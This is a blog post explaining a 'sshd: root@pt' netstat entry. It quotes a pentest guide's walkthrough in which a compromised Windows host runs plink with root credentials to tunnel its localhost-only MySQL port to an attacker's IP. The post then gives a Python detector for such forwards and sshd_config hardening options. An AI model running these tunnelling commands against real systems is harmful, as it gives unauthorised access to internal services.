I noticed something curious like the following in netstat, so I looked it up.

sshd: root@pt 


Anyway.. it seems to let the remote side use a port through ssh port forwarding..

For a single port, maybe this is the cleaner way?

Remote port forwarding

Remote port forwarding is crazy, yet very simple concept. So imagine that you have compromised a machine, and that machine has like MYSQL running but it is only accessible for localhost. And you can't access it because you have a really crappy shell. So what we can do is just forward that port to our attacking machine. The steps are as follows:


Here is how you create a remote port forwarding:

ssh <gateway> -R <remote port to bind>:<local host>:<local port>


By the way, plink is a ssh-client for windows that can be run from the terminal. The ip of the attacking machine is 111.111.111.111.


Step 1 So on our compromised machine we do:

plink.exe -l root -pw mysecretpassword 111.111.111.111 -R 3307:127.0.0.1:3306


Step 2 Now we can check netstat on our attacking machine, we should see something like this:

tcp        0      0 127.0.0.1:3307          0.0.0.0:*               LISTEN      19392/sshd: root@pt

That means that we can connect to that port on the attacking machine from the attacking machine.


Step 3 Connect using the following command:

mysql -u root -p -h 127.0.0.1 --port=3307 


[Link: https://xapax.gitbooks.io/security/content/port_forwarding_and_tunneling.html]
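
Seen from the monitoring side, the netstat line above is what gives a remote forward away: the listening socket belongs to a per-session sshd process rather than to the master daemon. The following is an added example, not part of the original post or the quoted guide, that scans `netstat -tlnp` output for such listeners. Every sample line except the 3307 one is constructed, and it assumes the process title keeps the `sshd: user@...` form shown above.

```python
import re

# Constructed sample of `netstat -tlnp` output; only the 3307 line comes from the post.
SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      1044/mysqld
tcp        0      0 127.0.0.1:3307          0.0.0.0:*               LISTEN      19392/sshd: root@pt
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      20117/sshd: deploy@
tcp6       0      0 :::22                   :::*                    LISTEN      812/sshd
"""

# Columns: proto, recv-q, send-q, local addr:port, foreign, LISTEN, pid/program
LINE = re.compile(
    r"^(tcp6?)\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(\d+)/(.*)$"
)
# Per-session sshd title "sshd: user@tty" (netstat truncates it, e.g. "root@pt").
SESSION = re.compile(r"^sshd: ([^\s@\[]+)@")
LOOPBACK = {"127.0.0.1", "::1"}

def find_ssh_forward_listeners(netstat_output):
    """Return listeners held by a per-session sshd process (ssh -R forwards)."""
    findings = []
    for line in netstat_output.splitlines():
        m = LINE.match(line.rstrip())
        if not m:
            continue  # header, UDP, or a socket that is not listening
        _proto, addr, port, pid, program = m.groups()
        s = SESSION.match(program)
        if not s:
            continue  # master sshd, mysqld, and other ordinary listeners
        findings.append({
            "port": int(port),
            "bind": addr,
            "pid": int(pid),
            "user": s.group(1),
            # A non-loopback bind means other hosts can reach the tunnel.
            "exposed": addr not in LOOPBACK,
        })
    return findings

if __name__ == "__main__":
    for f in find_ssh_forward_listeners(SAMPLE):
        scope = "reachable from network" if f["exposed"] else "loopback only"
        print(f"sshd forward: port {f['port']} on {f['bind']} "
              f"(pid {f['pid']}, user {f['user']}, {scope})")
```

On servers that should not accept `-R` forwards at all, the `AllowTcpForwarding` and `PermitListen` options in sshd_config restrict them.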

Posted by 구차니